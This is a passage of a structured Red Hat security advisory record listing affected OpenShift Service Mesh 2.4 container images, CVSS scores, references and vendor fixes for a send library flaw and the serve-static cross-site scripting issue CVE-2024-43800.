"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "send: Code Execution Vulnerability in Send Library", }, { cve: "CVE-2024-43800", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:33.631718+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311154", }, ], notes: [ { category: "description", text: "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().", title: "Vulnerability description", }, { category: "summary", text: "serve-static: Improper Sanitization in serve-static", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43800", }, { category: "external", summary: "RHBZ#2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43800", url: "https://www.cve.org/CVERecord?id=CVE-2024-43800", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", url: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", url: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", }, { category: "external", summary: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", url: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", }, ], release_date: "2024-09-10T15:15:17.937000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:22:37+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7724", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "serve-static: Improper Sanitization in serve-static", }, ], }
RHSA-2024:8113
Vulnerability from csaf_redhat
Published
2024-10-15 08:52
Modified
2025-04-10 00:22
Summary
Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.16.3 security and bug fix update
Notes
Topic
